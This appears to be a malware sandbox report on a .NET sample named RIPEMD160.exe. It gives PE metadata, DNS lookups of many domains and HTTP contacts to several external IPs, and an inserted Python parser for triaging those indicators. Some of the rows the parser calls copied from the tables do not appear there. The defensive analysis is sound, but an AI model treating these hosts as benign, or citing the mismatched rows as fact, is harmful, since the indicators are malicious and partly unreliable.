                                                                                              Instruction
                                                                                              jmp dword ptr [00402000h]
                                                                                              add byte ptr [eax], al

                                                                                              Data Directories

                                                                                               Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                               IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                                               IMAGE_DIRECTORY_ENTRY_IMPORT          0x76320          0x4f          .text
                                                                                               IMAGE_DIRECTORY_ENTRY_RESOURCE        0x78000          0x118a0       .rsrc
                                                                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                               IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                               IMAGE_DIRECTORY_ENTRY_BASERELOC       0x8a000          0xc           .reloc
                                                                                               IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                               IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                               IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                                                               IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                              Sections

                                                                                               Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                                                                               .text   0x2000           0x74378       0x74400   False     0.750888356855   data       7.41809908536   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                               .rsrc   0x78000          0x118a0       0x11a00   False     0.205175088652   data       3.67376297045   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                               .reloc  0x8a000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                               Name           RVA      Size     Type                                             Language  Country
                                                                                               RT_ICON        0x78130  0x10828  data
                                                                                               RT_GROUP_ICON  0x88958  0x14     data
                                                                                               RT_VERSION     0x8896c  0x324    data
                                                                                               RT_MANIFEST    0x88c90  0xc0f    XML 1.0 document, UTF-8 Unicode (with BOM) text

                                                                                              Imports

                                                                                               DLL          Import
                                                                                               mscoree.dll  _CorExeMain

                                                                                              Version Infos

                                                                                               Description       Data
                                                                                               Translation       0x0000 0x04b0
                                                                                               LegalCopyright    Copyright 2018
                                                                                               Assembly Version  1.0.0.0
                                                                                               InternalName      RIPEMD160.exe
                                                                                               FileVersion       1.0.0.0
                                                                                               CompanyName
                                                                                               LegalTrademarks
                                                                                               Comments
                                                                                               ProductName       RegisterVB
                                                                                               ProductVersion    1.0.0.0
                                                                                               FileDescription   RegisterVB
                                                                                               OriginalFilename  RIPEMD160.exe

                                                                                              Network Behavior

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              Feb 23, 2021 09:39:53.092580080 CET4974280192.168.2.5160.153.133.87
                                                                                              Feb 23, 2021 09:39:53.142450094 CET8049742160.153.133.87192.168.2.5
                                                                                              Feb 23, 2021 09:39:53.142563105 CET4974280192.168.2.5160.153.133.87
                                                                                              Feb 23, 2021 09:39:53.143121958 CET4974280192.168.2.5160.153.133.87
                                                                                              Feb 23, 2021 09:39:53.193479061 CET8049742160.153.133.87192.168.2.5
                                                                                              Feb 23, 2021 09:39:53.203397036 CET8049742160.153.133.87192.168.2.5
                                                                                              Feb 23, 2021 09:39:53.203428984 CET8049742160.153.133.87192.168.2.5
                                                                                              Feb 23, 2021 09:39:53.203448057 CET8049742160.153.133.87192.168.2.5
                                                                                              Feb 23, 2021 09:39:53.203627110 CET4974280192.168.2.5160.153.133.87
                                                                                              Feb 23, 2021 09:39:53.203808069 CET4974280192.168.2.5160.153.133.87
                                                                                              Feb 23, 2021 09:39:53.253568888 CET8049742160.153.133.87192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.419117928 CET4974380192.168.2.5194.9.94.85
                                                                                              Feb 23, 2021 09:40:03.483418941 CET8049743194.9.94.85192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.483541965 CET4974380192.168.2.5194.9.94.85
                                                                                              Feb 23, 2021 09:40:03.483678102 CET4974380192.168.2.5194.9.94.85
                                                                                              Feb 23, 2021 09:40:03.546354055 CET8049743194.9.94.85192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.546607018 CET8049743194.9.94.85192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.546665907 CET8049743194.9.94.85192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.546684027 CET8049743194.9.94.85192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.546703100 CET8049743194.9.94.85192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.546719074 CET8049743194.9.94.85192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.546730995 CET8049743194.9.94.85192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.546781063 CET4974380192.168.2.5194.9.94.85
                                                                                              Feb 23, 2021 09:40:03.546897888 CET4974380192.168.2.5194.9.94.85
                                                                                              Feb 23, 2021 09:40:03.547061920 CET4974380192.168.2.5194.9.94.85
                                                                                              Feb 23, 2021 09:40:08.647533894 CET4974480192.168.2.5194.59.164.34
                                                                                              Feb 23, 2021 09:40:09.038208961 CET8049744194.59.164.34192.168.2.5
                                                                                              Feb 23, 2021 09:40:09.038321018 CET4974480192.168.2.5194.59.164.34
                                                                                              Feb 23, 2021 09:40:09.038458109 CET4974480192.168.2.5194.59.164.34
                                                                                              Feb 23, 2021 09:40:09.429066896 CET8049744194.59.164.34192.168.2.5
                                                                                              Feb 23, 2021 09:40:09.429874897 CET8049744194.59.164.34192.168.2.5
                                                                                              Feb 23, 2021 09:40:09.429898024 CET8049744194.59.164.34192.168.2.5
                                                                                              Feb 23, 2021 09:40:09.429910898 CET8049744194.59.164.34192.168.2.5
                                                                                              Feb 23, 2021 09:40:09.429923058 CET8049744194.59.164.34192.168.2.5
                                                                                              Feb 23, 2021 09:40:09.430167913 CET4974480192.168.2.5194.59.164.34
                                                                                              Feb 23, 2021 09:40:09.430193901 CET4974480192.168.2.5194.59.164.34
                                                                                              Feb 23, 2021 09:40:09.430233955 CET4974480192.168.2.5194.59.164.34
                                                                                              Feb 23, 2021 09:40:09.822710037 CET8049744194.59.164.34192.168.2.5

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 23, 2021 09:38:02.505060911 CET | 52704 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:02.558099985 CET | 53 | 52704 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:02.710143089 CET | 52212 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:02.761518955 CET | 53 | 52212 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:02.787749052 CET | 54302 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:02.836307049 CET | 53 | 54302 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:02.928085089 CET | 53784 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:02.976670027 CET | 53 | 53784 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:03.854566097 CET | 65307 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:03.881243944 CET | 64344 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:03.906522036 CET | 53 | 65307 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:03.910783052 CET | 62060 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:03.930617094 CET | 53 | 64344 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:03.959408045 CET | 53 | 62060 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:05.107301950 CET | 61805 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:05.156344891 CET | 53 | 61805 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:06.091387987 CET | 54795 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:06.150312901 CET | 53 | 54795 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:06.371265888 CET | 49557 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:06.419986963 CET | 53 | 49557 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:07.559832096 CET | 61733 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:07.608767033 CET | 53 | 61733 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:08.867094040 CET | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:08.921020985 CET | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:10.289885044 CET | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:10.346569061 CET | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:12.428487062 CET | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:12.477117062 CET | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:16.062007904 CET | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:16.113447905 CET | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:17.056768894 CET | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:17.109467983 CET | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:18.313127041 CET | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:18.361856937 CET | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:21.820666075 CET | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:21.873004913 CET | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:30.005348921 CET | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:30.066828012 CET | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:42.326093912 CET | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:42.377578974 CET | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:58.038872957 CET | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:58.101281881 CET | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:58.983453035 CET | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:59.052273035 CET | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:38:59.117753029 CET | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:38:59.168037891 CET | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:05.469280005 CET | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:05.517968893 CET | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:08.852982998 CET | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:09.070103884 CET | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:13.727977037 CET | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:13.787894964 CET | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:19.103014946 CET | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:19.169167042 CET | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:24.871124983 CET | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:24.941981077 CET | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:29.962445021 CET | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:30.106431007 CET | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:35.671660900 CET | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:35.745763063 CET | 53 | 58530 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:39.324681044 CET | 53813 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:39.398113012 CET | 53 | 53813 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:40.466918945 CET | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:40.540991068 CET | 53 | 63732 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:41.340522051 CET | 57344 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:41.344240904 CET | 54450 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:41.397864103 CET | 53 | 57344 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:41.814722061 CET | 53 | 54450 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:41.903491974 CET | 59261 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:41.960423946 CET | 53 | 59261 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:42.434211016 CET | 57151 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:42.512608051 CET | 53 | 57151 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:43.085506916 CET | 59413 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:43.145399094 CET | 53 | 59413 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:43.567975044 CET | 60516 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:43.637036085 CET | 53 | 60516 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:43.783298016 CET | 51649 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:43.845468044 CET | 53 | 51649 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:44.736867905 CET | 65086 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:44.799204111 CET | 53 | 65086 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:45.650104046 CET | 56432 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:45.701723099 CET | 53 | 56432 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:46.171679974 CET | 52929 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:46.231209993 CET | 53 | 52929 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:46.825200081 CET | 64317 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:46.897975922 CET | 53 | 64317 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:52.012540102 CET | 61004 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:53.022897005 CET | 61004 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:53.090861082 CET | 53 | 61004 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:39:58.237720013 CET | 56895 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:39:58.308913946 CET | 53 | 56895 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:40:03.325084925 CET | 62372 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:40:03.417793036 CET | 53 | 62372 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:40:08.564743996 CET | 61515 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:40:08.646218061 CET | 53 | 61515 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:40:14.450964928 CET | 56675 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:40:14.522613049 CET | 53 | 56675 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 09:40:19.526774883 CET | 57172 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 09:40:19.689696074 CET | 53 | 57172 | 8.8.8.8 | 192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 23, 2021 09:39:08.852982998 CET | 192.168.2.5 | 8.8.8.8 | 0x6c06 | Standard query (0) | www.diabetessurgeryturkey.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:39:19.103014946 CET | 192.168.2.5 | 8.8.8.8 | 0xc795 | Standard query (0) | www.mojavewellnessaz.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:39:24.871124983 CET | 192.168.2.5 | 8.8.8.8 | 0x81c3 | Standard query (0) | www.vanjele.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:39:29.962445021 CET | 192.168.2.5 | 8.8.8.8 | 0x2992 | Standard query (0) | www.ficuswildlife.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:39:35.671660900 CET | 192.168.2.5 | 8.8.8.8 | 0xe2fb | Standard query (0) | www.thisisauckland.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:39:41.344240904 CET | 192.168.2.5 | 8.8.8.8 | 0x91d2 | Standard query (0) | www.topkids.asia | A (IP address) | IN (0x0001)
Feb 23, 2021 09:39:46.825200081 CET | 192.168.2.5 | 8.8.8.8 | 0xe71d | Standard query (0) | www.trainingkanban.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:39:52.012540102 CET | 192.168.2.5 | 8.8.8.8 | 0x725 | Standard query (0) | www.sphenecouture.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:39:53.022897005 CET | 192.168.2.5 | 8.8.8.8 | 0x725 | Standard query (0) | www.sphenecouture.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:39:58.237720013 CET | 192.168.2.5 | 8.8.8.8 | 0x48f1 | Standard query (0) | www.xlkefu2.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:40:03.325084925 CET | 192.168.2.5 | 8.8.8.8 | 0xdf8e | Standard query (0) | www.dorteklarskov.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:40:08.564743996 CET | 192.168.2.5 | 8.8.8.8 | 0x1ba5 | Standard query (0) | www.gurumanindustries.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:40:14.450964928 CET | 192.168.2.5 | 8.8.8.8 | 0xe2ad | Standard query (0) | www.thedesailldada.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:40:19.526774883 CET | 192.168.2.5 | 8.8.8.8 | 0x2931 | Standard query (0) | www.buildermarketingprogram.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 23, 2021 09:39:09.070103884 CET | 8.8.8.8 | 192.168.2.5 | 0x6c06 | Server failure (2) | www.diabetessurgeryturkey.com | none | none | A (IP address) | IN (0x0001)
Feb 23, 2021 09:39:19.169167042 CET | 8.8.8.8 | 192.168.2.5 | 0xc795 | No error (0) | www.mojavewellnessaz.com | mojavewellnessaz.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:39:19.169167042 CET | 8.8.8.8 | 192.168.2.5 | 0xc795 | No error (0) | mojavewellnessaz.com | | 107.180.46.143 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:39:24.941981077 CET | 8.8.8.8 | 192.168.2.5 | 0x81c3 | Name error (3) | www.vanjele.com | none | none | A (IP address) | IN (0x0001)
Feb 23, 2021 09:39:30.106431007 CET | 8.8.8.8 | 192.168.2.5 | 0x2992 | No error (0) | www.ficuswildlife.com | | 138.197.103.178 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:39:35.745763063 CET | 8.8.8.8 | 192.168.2.5 | 0xe2fb | No error (0) | www.thisisauckland.com | thisisauckland.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:39:35.745763063 CET | 8.8.8.8 | 192.168.2.5 | 0xe2fb | No error (0) | thisisauckland.com | | 77.72.1.202 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:39:41.814722061 CET | 8.8.8.8 | 192.168.2.5 | 0x91d2 | Name error (3) | www.topkids.asia | none | none | A (IP address) | IN (0x0001)
Feb 23, 2021 09:39:46.897975922 CET | 8.8.8.8 | 192.168.2.5 | 0xe71d | No error (0) | www.trainingkanban.com | | 51.83.43.226 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:39:53.090861082 CET | 8.8.8.8 | 192.168.2.5 | 0x725 | No error (0) | www.sphenecouture.com | sphenecouture.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:39:53.090861082 CET | 8.8.8.8 | 192.168.2.5 | 0x725 | No error (0) | sphenecouture.com | | 160.153.133.87 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:39:58.308913946 CET | 8.8.8.8 | 192.168.2.5 | 0x48f1 | Name error (3) | www.xlkefu2.com | none | none | A (IP address) | IN (0x0001)
Feb 23, 2021 09:40:03.417793036 CET | 8.8.8.8 | 192.168.2.5 | 0xdf8e | No error (0) | www.dorteklarskov.com | | 194.9.94.85 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:40:03.417793036 CET | 8.8.8.8 | 192.168.2.5 | 0xdf8e | No error (0) | www.dorteklarskov.com | | 194.9.94.86 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:40:08.646218061 CET | 8.8.8.8 | 192.168.2.5 | 0x1ba5 | No error (0) | www.gurumanindustries.com | gurumanindustries.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:40:08.646218061 CET | 8.8.8.8 | 192.168.2.5 | 0x1ba5 | No error (0) | gurumanindustries.com | | 194.59.164.34 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:40:14.522613049 CET | 8.8.8.8 | 192.168.2.5 | 0xe2ad | Name error (3) | www.thedesailldada.com | none | none | A (IP address) | IN (0x0001)
Feb 23, 2021 09:40:19.689696074 CET | 8.8.8.8 | 192.168.2.5 | 0x2931 | No error (0) | www.buildermarketingprogram.com | | 208.97.149.17 | A (IP address) | IN (0x0001)
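The packet and DNS tables in this report are exported with the port and address columns fused into one digit string, and that string is genuinely ambiguous: the UDP response row "53527048.8.8.8192.168.2.5" reads equally as 53/52704/8.8.8.8 or as 53/5270/48.8.8.8 unless you bring in constraints from outside the row. The Python below is an added example, not part of the report and not the sandbox vendor's own tooling. It recovers the columns by enumerating every split and keeping the one consistent with facts visible in the report, stated as assumptions in the code: the analysis VM is 192.168.2.5, its client ports fall in the Windows dynamic range (49152-65535), and the only server ports in the capture are 53 and 80. It then parses the DNS Answers rows and reports, for each name the sample looked up, whether the lookup failed (NXDOMAIN or SERVFAIL) or resolved, and whether the VM actually opened a TCP/80 session to the resolved address. That last distinction is what separates live contacts from domains the sample merely cycled through, which is what a responder wants before turning this table into indicators. The embedded rows are copied from the tables on this page.

```python
import re
from dataclasses import dataclass

# Assumptions taken from this report, not from the sandbox vendor's own code:
# the analysis VM is 192.168.2.5, its client ports are in the Windows dynamic
# range (49152-65535) and the only server ports in the capture are 53 and 80.
SANDBOX_HOST = "192.168.2.5"
SERVICE_PORTS = {53, 80}
EPHEMERAL_MIN = 49152

ROW_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]{3,4})(?P<rest>.*)$")
DNS_ANS_RE = re.compile(r"^(?P<ips>[\d.]+)(?P<txid>0x[0-9a-f]+)(?P<rcode>[A-Za-z ]+) \((?P<rc>\d)\)"
                        r"(?P<body>.*?)(?P<rtype>A|CNAME) \([^)]*\)IN \(0x0001\)$")
IP_TAIL_RE = re.compile(r"^(?P<name>.+?)(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$")


@dataclass(frozen=True)
class Packet:
    ts: str
    src_port: int
    dst_port: int
    src_ip: str
    dst_ip: str


@dataclass(frozen=True)
class DnsAnswer:
    ts: str
    txid: str
    rcode: int
    name: str
    rtype: str
    data: "str | None"  # A-record address; None for failed lookups and CNAME rows


def _octet_ok(s):
    return 1 <= len(s) <= 3 and s.isdigit() and (s == "0" or s[0] != "0") and int(s) <= 255


def _port_ok(s):
    return s.isdigit() and s[0] != "0" and int(s) <= 65535


def _plausible(p):
    """Exactly one end is the sandbox VM on an ephemeral port and the other end
    is on a known service port; this constraint is what makes the split unique."""
    if p.src_ip == SANDBOX_HOST and p.dst_ip != SANDBOX_HOST:
        return p.src_port >= EPHEMERAL_MIN and p.dst_port in SERVICE_PORTS
    if p.dst_ip == SANDBOX_HOST and p.src_ip != SANDBOX_HOST:
        return p.dst_port >= EPHEMERAL_MIN and p.src_port in SERVICE_PORTS
    return False


def parse_packet_row(line):
    """Recover ports and IPs from a fused row like '... CET8049728138.197.103.178192.168.2.5'.
    After splitting on '.', only two tokens are ambiguous: the first (src port + dst port +
    first octet of src IP) and the fourth (last octet of src IP + first octet of dst IP).
    Enumerate every split of those two tokens and keep the single plausible one."""
    m = ROW_RE.match(line.strip())
    tok = m.group("rest").split(".") if m else []
    if len(tok) != 7:
        raise ValueError(f"not a packet row: {line!r}")
    head, mid, found = tok[0], tok[3], []
    for n1 in (1, 2, 3):                        # digits in src IP's first octet
        o1, ports = head[-n1:], head[:-n1]
        for k in range(1, len(ports)):          # src_port | dst_port boundary
            sp, dp = ports[:k], ports[k:]
            for n4 in (1, 2, 3):                # digits in src IP's last octet
                o4, d1 = mid[:n4], mid[n4:]
                if not all(map(_octet_ok, (o1, o4, d1))) or not (_port_ok(sp) and _port_ok(dp)):
                    continue
                p = Packet(m.group("ts"), int(sp), int(dp),
                           ".".join((o1, tok[1], tok[2], o4)), ".".join((d1, tok[4], tok[5], tok[6])))
                if _plausible(p):
                    found.append(p)
    if len(found) != 1:
        raise ValueError(f"{len(found)} plausible splits for {line!r}")
    return found[0]


def parse_dns_answer_row(line):
    """Parse a fused 'DNS Answers' row. The A-record address is split off the owner
    name; a CNAME target fused to its owner name is left unsplit (it is ambiguous)."""
    m = ROW_RE.match(line.strip())
    d = DNS_ANS_RE.match(m.group("rest")) if m else None
    if not d:
        raise ValueError(f"not a DNS answer row: {line!r}")
    body, rc, rtype, data = d.group("body"), int(d.group("rc")), d.group("rtype"), None
    if rc != 0 and body.endswith("nonenone"):       # empty CName and Address cells
        body = body[:-len("nonenone")]
    elif rc == 0 and rtype == "A":
        t = IP_TAIL_RE.match(body)
        body, data = t.group("name"), t.group("ip")
    return DnsAnswer(m.group("ts"), d.group("txid"), rc, body, rtype, data)


def contacted_hosts(dns_rows, packet_rows):
    """Map each looked-up name to (A-record address or None, VM opened TCP/80 to it)."""
    dialed = set()
    for p in map(parse_packet_row, packet_rows):
        if p.src_ip == SANDBOX_HOST and p.dst_port == 80:
            dialed.add(p.dst_ip)
    result = {}
    for a in map(parse_dns_answer_row, dns_rows):
        if a.rcode != 0:
            result[a.name] = (None, False)
        elif a.rtype == "A":
            result[a.name] = (a.data, a.data in dialed)
    return result


# Rows copied from the TCP/UDP Packets and DNS Answers tables of this report.
PACKET_ROWS = [
    "Feb 23, 2021 09:38:02.505060911 CET5270453192.168.2.58.8.8.8",
    "Feb 23, 2021 09:38:02.558099985 CET53527048.8.8.8192.168.2.5",
    "Feb 23, 2021 09:39:30.375792980 CET4972880192.168.2.5138.197.103.178",
    "Feb 23, 2021 09:39:30.501974106 CET8049728138.197.103.178192.168.2.5",
    "Feb 23, 2021 09:39:46.899447918 CET4974180192.168.2.551.83.43.226",
]
DNS_ROWS = [
    "Feb 23, 2021 09:39:09.070103884 CET8.8.8.8192.168.2.50x6c06Server failure (2)www.diabetessurgeryturkey.comnonenoneA (IP address)IN (0x0001)",
    "Feb 23, 2021 09:39:24.941981077 CET8.8.8.8192.168.2.50x81c3Name error (3)www.vanjele.comnonenoneA (IP address)IN (0x0001)",
    "Feb 23, 2021 09:39:30.106431007 CET8.8.8.8192.168.2.50x2992No error (0)www.ficuswildlife.com138.197.103.178A (IP address)IN (0x0001)",
    "Feb 23, 2021 09:39:46.897975922 CET8.8.8.8192.168.2.50xe71dNo error (0)www.trainingkanban.com51.83.43.226A (IP address)IN (0x0001)",
    "Feb 23, 2021 09:40:19.689696074 CET8.8.8.8192.168.2.50x2931No error (0)www.buildermarketingprogram.com208.97.149.17A (IP address)IN (0x0001)",
]
```

Calling `contacted_hosts(DNS_ROWS, PACKET_ROWS)` on the embedded rows yields www.ficuswildlife.com and www.trainingkanban.com as resolved and dialed, www.buildermarketingprogram.com as resolved but never contacted within the rows given, and the two failed lookups with no address. The parser raises rather than guessing when zero or more than one split survives the constraints, so a row from a differently configured VM (another address, a non-Windows port range, an extra service port) fails loudly instead of silently producing wrong indicators; adjust the three constants at the top for such a report.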

HTTP Request Dependency Graph

• www.mojavewellnessaz.com
• www.ficuswildlife.com
• www.thisisauckland.com
• www.trainingkanban.com
• www.sphenecouture.com
• www.dorteklarskov.com
• www.gurumanindustries.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
